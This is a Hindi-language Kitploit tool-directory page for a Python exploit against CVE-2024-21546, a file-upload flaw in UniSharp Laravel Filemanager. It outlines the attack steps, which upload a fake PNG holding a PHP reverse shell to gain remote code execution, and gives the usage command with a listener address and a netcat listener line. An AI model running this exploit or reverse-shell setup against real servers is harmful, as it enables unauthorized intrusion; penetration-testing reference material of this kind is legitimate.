Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-21546 — यह Python एक्सप्लॉइट स्क्रिप्ट UniSharp द्वारा बनाए गए एक कमजोर Laravel Filemanager को लक्षित करती है, जो प्रमाणित उपयोगकर्ताओं को फ़ाइल प्रतिबंधों को बायपास करने और दुर्भावनापूर्ण फ़ाइलें अपलोड करने की अनुमति देती है। यह अपलोड किए गए पेलोड के ट्रिगर होने पर Remote Code Execution (RCE) का कारण बन सकता है। | Kitploit
उपकरण/GitHubGitHub/ajdumanhug/cve-2024-21546
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubajdumanhug/cve-2024-21546

CVE-2024-21546

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
5121 साल पहलेअभी तक समीक्षित नहीं

विवरण

यह Python एक्सप्लॉइट स्क्रिप्ट UniSharp द्वारा बनाए गए एक कमजोर Laravel Filemanager को लक्षित करती है, जो प्रमाणित उपयोगकर्ताओं को फ़ाइल प्रतिबंधों को बायपास करने और दुर्भावनापूर्ण फ़ाइलें अपलोड करने की अनुमति देती है। यह अपलोड किए गए पेलोड के ट्रिगर होने पर Remote Code Execution (RCE) का कारण बन सकता है।

साझा करें

CVE-2024-21546 Python Exploit

🔥 विवरण

यह पायथन एक्सप्लॉइट स्क्रिप्ट UniSharp द्वारा बनाए गए एक कमजोर Laravel Filemanager को लक्षित करती है, जो प्रमाणित उपयोगकर्ताओं को फ़ाइल प्रतिबंधों को बायपास करने और दुर्भावनापूर्ण फ़ाइलें अपलोड करने की अनुमति देती है। यह अपलोड किए गए पेलोड के ट्रिगर होने पर रिमोट कोड निष्पादन (RCE) का कारण बन सकता है।

एक्सप्लॉइट निम्नलिखित कार्य करता है:

  • उपयोगकर्ता द्वारा प्रदान किए गए laravel_session को मान्य करता है
  • रीजेक्स के माध्यम से CSRF _token निकालता है
  • PHP रिवर्स शेल पेलोड युक्त एक नकली PNG फ़ाइल अपलोड करता है
  • अपलोड की गई फ़ाइल को ट्रिगर करता है

⚠️ प्रभावित संस्करण

संस्करण 2.9.1 और उससे पहले के संस्करण

⚙️ उपयोग

root@kitploit:~
python3 CVE-2024-21546.py <target_url> <listener_ip> <listener_port> <laravel_session>

महत्वपूर्ण: स्क्रिप्ट चलाने से पहले अपना लिसनर शुरू करें:

root@kitploit:~
nc -lvnp <listener_port>

💻 नमूना रन

image

ℹ️ संदर्भ

  • CVE-2024-21546
  • Unisharp Laravel Filemanager पर अपलोड शेल के माध्यम से RCE
  • कमिट 8170760
टूल डाउनलोड करें